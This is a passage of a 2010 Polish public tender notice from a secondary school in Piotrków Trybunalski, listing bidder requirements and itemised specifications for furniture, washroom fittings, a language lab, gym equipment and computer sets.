h)  Podwójny system  mikrofonów bezprzewodowych   w systemie  Diversity Receiver  pracujących w wysokich pasmach częstotliwości dopuszczalnych w RP,   , o charakterystyce kardioidalnej      2 szt.
i) Mikrofon przewodowy z wyłącznikiem  1 szt
j)  Skrzynia montażowa typu rack na w/w sprzęt    1 szt
k)  Gwarancja serwisowa na w/w sprzęt  36 miesięcy, niezależnie od gwarancji producenta na w/w sprzęt wchodzący w skład systemu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.00.00-1, 39.14.40.00-3, 44.41.00.00-7, 39.14.40.00-3, 39.16.21.00-6, 30.23.60.00-2, 30.21.33.00-8, 32.34.24.12-3, 32.34.20.00-2, 37.42.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą SIWZ. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności wykonawca musi spełniać następujący warunek:
a)	wykonać w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
- co do części I co najmniej jedną pracę odpowiadającą zakresowi i złożoności porównywalnej z przedmiotem niniejszego zamówienia i wartości co najmniej               50.000,00 zł brutto. Za prace odpowiadające zakresowi i złożoności porównywalnej z przedmiotem niniejszego zamówienia uznane będą dostawy 
mebli.
- co do części III co najmniej jedną pracę odpowiadającą zakresowi i złożoności porównywalnej z przedmiotem niniejszego zamówienia i wartości co najmniej 25.000,00 zł brutto. Za prace odpowiadające zakresowi i złożoności porównywalnej z przedmiotem niniejszego zamówienia uznane będą dostawy 
sprzętu i przedmiotów potrzebnych do wyposażenia sal do nauki języków obcych.
- co do części V co najmniej jedną pracę odpowiadającą zakresowi i złożoności porównywalnej z przedmiotem niniejszego zamówienia i wartości co najmniej 25.000,00 zł brutto. Za prace odpowiadające zakresowi i złożoności porównywalnej z przedmiotem niniejszego zamówienia uznane będą dostawy 
sprzętu komputerowego
- co do części VI co najmniej jedną pracę odpowiadającą zakresowi i złożoności porównywalnej z przedmiotem niniejszego zamówienia i wartości co najmniej 25.000,00 zł brutto. Za prace odpowiadające zakresowi i złożoności porównywalnej z przedmiotem niniejszego zamówienia uznane będą dostawy 
sprzętu nagłośnieniowego - wg załącznika nr 4;

Co do części II i IV Wykonawca chcąc spełnić niniejszy warunek składa oświadczenie z art.22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r., Nr 113, poz. 759 e zm.) stanowiący załącznik nr 5.

W celu potwierdzenia spełniania ww. warunków wykonawcy zobowiązani są przedłożyć następujące dokumenty:
a)	wykaz wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
- co do części I co najmniej jedną pracę odpowiadającą zakresowi i złożoności porównywalnej z przedmiotem niniejszego zamówienia i wartości co najmniej               50.000,00 zł brutto. Za prace odpowiadające zakresowi i złożoności porównywalnej z przedmiotem niniejszego zamówienia uznane będą dostawy 
mebli.
- co do części III co najmniej jedną pracę odpowiadającą zakresowi i złożoności porównywalnej z przedmiotem niniejszego zamówienia i wartości co najmniej 25.000,00 zł brutto. Za prace odpowiadające zakresowi i złożoności porównywalnej z przedmiotem niniejszego zamówienia uznane będą dostawy 
sprzętu i przedmiotów potrzebnych do wyposażenia sal do nauki języków obcych.
- co do części V co najmniej jedną pracę odpowiadającą zakresowi i złożoności porównywalnej z przedmiotem niniejszego zamówienia i wartości co najmniej 25.000,00 zł brutto. Za prace odpowiadające zakresowi i złożoności porównywalnej z przedmiotem niniejszego zamówienia uznane będą dostawy 
sprzętu komputerowego
- co do części VI co najmniej jedną pracę odpowiadającą zakresowi i złożoności porównywalnej z przedmiotem niniejszego zamówienia i wartości co najmniej 25.000,00 zł brutto. Za prace odpowiadające zakresowi i złożoności porównywalnej z przedmiotem niniejszego zamówienia uznane będą dostawy 
sprzętu nagłośnieniowego - wg załącznika nr 4;

Co do części II i IV Wykonawca chcąc spełnić niniejszy warunek składa oświadczenie z art.22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r., Nr 113, poz. 759 e zm.) stanowiący załącznik nr 5.

Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą SIWZ. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.

UWAGA: Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca chcąc spełnić niniejszy warunek składa oświadczenie z art.22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r., Nr 113, poz. 759 e zm.) stanowiący załącznik nr 5.

Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą siwz. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca chcąc spełnić niniejszy warunek składa oświadczenie z art.22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r., Nr 113, poz. 759 e zm.) stanowiący załącznik nr 5.

Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą siwz. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca chcąc spełnić niniejszy warunek składa oświadczenie z art.22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r., Nr 113, poz. 759 e zm.) stanowiący załącznik nr 5.

Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą siwz. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy według wzoru zawartego w specyfikacji istotnych warunków zamówienia - wg załącznika nr 1 i 1a; 
2.	Stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej (należy załączyć oryginał lub kseropię potwierdzoną przez notariusza);
3.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu                o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy             w sprawie niniejszego zamówienia publicznego (należy załączyć oryginał lub kserokopię potwierdzoną przez notariusza);
4.	Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, sporządzone na podstawie wzoru stanowiącego - wg załącznika nr 5;
5.	Oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust 1 oraz ust 2 ustawy Pzp -  wg załącznika nr 2;
6. Oświadczenie wykonawcy o niezaleganiu z opłacaniem podatków oraz opłat i składek na ubezpieczenie zdrowotne i społeczne; wg załącznika nr 6</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsp4.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZESPÓŁ SZKÓŁ PONADGIMNAZJALNYCH NR 4
IM. KS. JERZEGO POPIEŁUSZKI
UL. SIENKIEWICZA 10/12
97 - 300 PIOTRKÓW TRYB.
 (SEKRETARIAT).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2010 godzina 08:00, miejsce: ZESPÓŁ SZKÓŁ PONADGIMNAZJALNYCH NR 4
IM. KS. JERZEGO POPIEŁUSZKI
UL. SIENKIEWICZA 10/12
97 - 300 PIOTRKÓW TRYB.
 (SEKRETARIAT).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I  - meble szkolne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.   1.	Zestaw szaf do pokoju nauczycielskiego	
	Meble wykonane z płyty wiórowej o grubości 18 mm , wieniec dolny   i górny z płyty o gr. 25 mm, kolor grusza calvados, okucia satynowe.


Szafka z 10 schowkami   o wymiarach 1800x800x400 mm
Szafka z 8 schowkami i przegrodami na dzienniki lekcyjne na 16 szt. o wymiarach  1800x800x400 mm
Szafa ubraniowa z drzwiami suwanymi, dzielona za pół    w pionie z drążkiem na wieszaki na całej szerokości  o wymiarach  1800x1600x600 mm                   	     

   


     3 szt.
     2 szt.
      
     1 szt.

      
      


     
  2.	Zestaw szafek do aneksu kuchennego - pokój nauczycielski  
Szafki wykonane z płyty wiórowej gr.18 mm, wieniec dolny            
 o gr. 25 mm, kolor grusza calvados.


Blat kuchenny o gr. 30 mm o łącznej długości 3500x600 mm
Szafka stojąca z 4 szufladami na prowadnicach  
1	wymiarach 400x500x850 mm
Szafka stojąca pod zlewozmywak        
1	wymiarach 900x500x850 mm
Szafka stojąca  z drzwiczkami, z półką w środku
1	wymiarach 600x500x850 mm
Szafka stojąca narożna     o wymiarach 800x500x850 mm
Szafka wisząca                 o wymiarach 600x350x750 mm
Zlewozmywak 1- komorowy z   ociekaczem , kolor stal dekor
                                         o wymiarach 780x435 mm
	




      

       1 szt.
       1 szt.

       1 szt.

       2 szt.

       1 szt.
       2 szt.
       1 szt.
       1 szt.
  3.	Stół konferencyjny z płyty wiórowej o gr. 25 mm na 5 nogach metalowych ,satynowych o wysokości 750 mm
o   wymiarach 1700x1000mm, kolor grusza calvados	
      3 szt.
  4.	Karnisz   drewniany  pojedyńczy, kolor grusza calvados długość   2500 mm
    	      2 szt.
  5.	Szafy wykonane z płyty wiórowej o gr. 18mm, wieniec górny i dolny z płyty 25 mm, kolor buk ciemny
Szafa z witryną o rozmiarach 1800x800x400 mm
Szafa aktowa     o rozmiarach 1800x800x400 mm
Szafa dzielona ? aktowa, ? ubraniowa 1800x800x400	


     3 szt.
      3 szt.
      1 szt.
  6.	Krzesło tapicerowane, stelaż metalowy o przekroju     25 mm, kolor bordo ( stelaż + tapicerka)	      
    40 szt.
  7.	Krzesło siedzisko i oparcie z tworzywa sztucznego, stelaż metalowy lakierowany  w kolorze czarnym. Krzesła           z możliwością  łączenia w szeregi za pomocą klamer, kolor brązowy.	
   50 szt.
  8.	Krzesło konferencyjne ze sklejki z pulpitem składanym, stelaż metalowy w kolorze czarnym, siedziska i oparcie    w kolorze ciemnoszarym.	
  100 szt.
  9.	Krzesło obrotowe tapicerowane do biurek komputerowych
o  podstawie 5- ramiennej, z podłokietnikiem , regulowaną wysokością siedziska i odchylanym oparciem., kolor ciemnoszary. 	
    20 szt.
 10.	Szafka metalowa z 4 schowkami. Wieniec dolny z blachy ocynkowanej o gr.0,8 mm, pozostałe elementy z blachy  0,6 mm. Szafka wyposażona w 4 wieszaki na ubranie. Schowki szafy zamykane zamkami cylindrycznymi, ryglowane w jednym punkcie. Kolor beż.
                                     wymiary 1800x600x490 mm	

    35 szt.
 11.	Szafka metalowa z 2 schowkami. Opis jak wyżej,
Szafka wyposażona w 2 wieszaki na ubranie.                                     wymiary 1800x300,x490 mm
	
     6 szt.
 12.	Ławka do szatni, stelaż wykonany z rurki stalowej, malowanej w kolorze czarnym. Siedzisko wykonane          z trzech  listew z drewna liściastego, lakierowanych lakierem bezbarwnym. Nogi wyposażone w stopki             z tworzywa nie niszczące podłogi
                                    wymiary  460x2000x440 mm	


   16 szt.
 13.	Biurko wykonane z płyty wiórowej gr. 18 mm, blat gr.     25 mm, obrzeże z PCV o gr25 mm, .wyposażone               w 4 szuflady z zamkiem centralnym, kolor buk ciemny,   
                                    wymiary 1200x700x740 mm                                                	
    1 szt.
 14.	Biurko ( opis jak wyżej) z wysuwaną półką na klawiaturę   i miejscem  na komputer, wymiary 1400x700x740 mm	    1 szt.
 15.	Biurko 1-osobowe wykonane z płyty wiórowej gr. 18 mm, blat gr.25 mm, obrzeże z PCV o gr 25 mm, z wysuwaną półką na klawiaturę i miejscem na komputer, kolor buk ciemny
                                    wymiary 800x700x740 mm	
   18 szt.
 16.	Tablica szkolna ,zwykła zielona, wym. 1700x1000 mm	     1 szt.
 17. 	Wykładzina dywanowa, targowa  ekspomat , zabezpieczająca nawierzchnię hali sportowej atest antypoślizgowy i łatwopalności,  szerokość    2000 mm,   w kolorze ciemnoszarym. 	
1.250 m2

Zaoferowana cena musi zawierać usługę transportu i montażu zaoferowanych przez Wykonawcę przedmiotów za wyjątkiem wykładziny dywanowej w pkt 17 powyższej tabeli, która należy tylko dostarczyć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.16.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II - wyposażenie sanitariatów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Dozownik na mydło metalowy, pojemność 0,5 l.
kolor biały	    32 szt.  

   2.	Uchwyt na papier toaletowy metalowy, kolor srebrny	    26 szt.
   3.	Podajnik metalowy na ręczniki typ zz, kolor biały	    30 szt.
   4.	Szczotka wc plastykowa, kolor biały	    26 szt.
   5.	Lustro łazienkowe wiszące,
o wymiarach szer. 300 mm x dł. 400 mm.	    30 szt.   
 
   6.	Kosz na odpady o poj. 7 l. kolor biały	    38 szt.
   7.	Kosz  na odpady o poj. 10 l. kolor brąz	      8 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.40.00-3, 44.41.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III - sala językowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Pulpit nauczyciela z jednostką centralną wzmacniacz stereo	2 szt.
2.	Moduł INTERACTIVE umożliwiający sterowanie funkcjami pracowni za pomocą komputera (gniazdo USB)	2 szt.
3.	INTERACTIVE PC program do sterowania funkcjami pracowni za pomocą komputera 	2 szt.
4.	Moduł symulacji rozmowy telefonicznej	2 szt.
5.	Przyłączeniowe stanowisko dla ucznia	18 szt.
6.	Okablowanie 	36 szt.
7.	Radiomagnetofon  z CD lub DVD	2 szt.
8.	Głośniki  do zabudowy w biurku moc 80 Wat	4 szt.
9.	Słuchawki pasmo przenoszenia 40-14,400 Hz, impedancja 2x400Ohms, czułość >98dB, maksymalna moc wejścia 100mW, mikrofon dynamiczny, pasmo przenoszenia 40-15,000Hz,  impedancja 200 Ohms, czułość 15dB, przewód wyjątkowo odporny na uszkodzenia mechaniczne, ramię mikrofony elastyczne, odporne na uszkodzenia	36 szt.
10.	Wieszaki do słuchawek 	36 szt.
11.	Biurko dla nauczyciela w kolorze buk ciemny lub inny biurowy kolor  z 4 szufladami na prowadnicach	2 szt.
12.	Biurko narożne kolor buk ciemny lub inny biurowy kolor	4 szt.
13.	Biurko dla ucznia kolor buk ciemny 	14 szt.
14.	Krzesło dla nauczyciela 	2 szt.
15.	Krzesło dla ucznia stelaż metalowy w kolorze czarnym, siedzisko i oparcie ze sklejki nr 6	36 szt.
16	Program komputerowy  Profesor Klaus, Profesor Henry	po 1 szt.
17	Tablica multimedialna rozmiar 78, rozdzielczość 12800x9200 format 4:3, wymiary1868 mmx1329 mm, powierzchnia aktywna 1628mmx1175mm przekątna powierzchni aktywnej 2000mm wbudowane głośniki i wzmacniacz, pióro elektroniczne nauczyciela, ucznia	2
Funkcje pracowni:
-sterowanie rozmowami nauczyciel uczeń indywidualnie, nauczyciel uczniowie grupowo
-obsługiwanie urządzeń audio wizualnych, tablicy interaktywnaj
-wyświetlanie materiałów na ekranie lub tablicy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.22.10-6, 30.23.60.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV - siłownia - pomoce dydaktyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	                    Nazwa i opis	    Ilość
  1.	Materac gimnastyczny o wymiarach 1000x2000 mm	    3 szt.
  2.	Ławka pozioma ze stojakiem do wyciskania	    1 szt.
  3.	Hantle 5 kg.	    2 szt.
  4.	Hantle 4 kg.	   2 szt.
  5.	Gruszka bokserska,łożysko,platforma bokserska (komplet)	   1 szt.
  6.	Rękawice bokserskie	   6 par
  7.	Worki bokserskie 100 cm ze wspornikiem	    3 szt.
  8.	Piłka lekarska 3 kg. skóra naturalna	    3 szt.
  9.	Skakanki z linki stalowej z łozyskiem	    6 szt.
10.	Stoper mechaniczny	1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V - sala komputerowa - pomoce dydaktyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 18 ZESTAWÓW KOMPUTEROWYCH ( dla ucznia ) O NASTĘPUJĄCEJ SPECYFIKACJI:

1.	Płyta główna

Gniazdo procesora	Zgodne z procesorem zaproponowanym poniżej przez oferenta
Format	Micro ATX
Typ pamięci	Dwukanałowa obsługa pamięci 
Dwa złącza DIMM obsługujące do 4 GB pamięci DDR2 
Obsługa pamięci DDR2 1066(OC)/800/667 
Złącza rozszerzeń	1 x PCI Express x1 
1 x PCI Express x16 
2 x PCI 
Zintegrowana karta graficzna	Tak (Pixel Shader 2.0, DirectX 9.0, wielkość pamięci współdzielonej 384MB)

Zintegrowana karta dźwiękowa	6 kanałów
Zintegrowana karta sieciowa	10/100/1000 Mb/s
Porty z tyłu płyty	1 x COM 
1 x D-Sub 
1 x LPT 
1 x RJ45 LAN 
3 gniazdka audio (wejście liniowe/ wyjście liniowe/mikrofon) 
4 x USB 2.0/1.1 
2 x PS/2 (klawiatura/mysz) 
1 x VGA

Wewnętrzne złącza wejścia wyjścia	1 złącze zasilania 24-pin ATX 
1 złącze zasilania 4-pin ATX 12V 
1 x CD in 
1 złącze wentylatora procesora 
1 x FDD 
1 złącze pinowe front audio 
1 złącze front panel 
1 x IDE 
1 złącze power LED 
1 x SPDIF out 
1 złącze wentylatora systemowego 
2 x USB 2.0/1.1 
4 złącza SATA 3Gb/s 


2.	Procesor

Architektura procesora 	Zgodna z x86, dwurdzeniowy
Fabryczny wentylator	BOX
Min. wartość w teście SYSMark 2007	115 
Maksymalny pobór mocy 	65.W 

3.	Pamięć

Rodzaj pamięci	DDR 2, DIMM
Pojemność pamięci	2 x 1024 MB
Częstotliwość pracy	800 MHz
Obsługa ECC	Nie
Opóźnienie - cycle latency	5

4.	Napęd DVD RW

Pojemność nośnika	4,7 GB, 8,5 GB
Pojemność pamięci podręcznej	2000 kB
Interfejs	SATA
Odczytywane formaty dysków	DVD-ROM, DVD-R/RW, DVD-RAM, DVD-R (dwuwarstwowe), DVD+R/RW, DVD+R (dwuwarstwowe), CD-ROM
Klasa szybkości odczytu CD-ROM:	48x
Klasa szybkości zapisu CD-R	48x
Klasa szybkości zapisu CD-RW	4x
Klasa szybkości odczytu DVD-ROM	16x
Klasa szybkości zapisu DVD-R	22x
Klasa szybkości zapisu DVD-RW	6x
Klasa szybkości zapisu DVD+R	22x
Klasa szybkości zapisu DVD+RW	8x
Klasa szybkości zapisu DVD-RAM	12x
Klasa szybkości zapisu DVD+R (dwuwarstwowa)	12x
Klasa szybkości zapisu DVD-R (dwuwarstwowa)	12x
Dual Layer (nagrywanie płyt dwuwarstwowych)	Tak

5.	Dysk twardy

Interfejs	Serial ATA 3Gbps
Pojemność	250 GB
Prędkość obrotowa	7200 obr./min.
Pojemność bufora DRAM	8 MB
Średni czas dostępu	8,9 ms

6.	Obudowa

Typ	Mini Tower
Ilość kieszeni 5,25	2 szt.
Ilość kieszeni 3,5	2 szt.
Złącza w przednim panelu 	Audio, 2x USB
Kolor obudowy	Czarny (dopuszczone niewielkie dodatki np. srebrne)

7.	Zasilacz

Moc minimalna	400W
Funkcja PFC	Tak
Filtry	Przeciwzwarciowy, przeciwprzepięciowy, przeciwprzeciążeniowy
Ilość wentylatorów chłodzących 	1 wolnoobrotowy
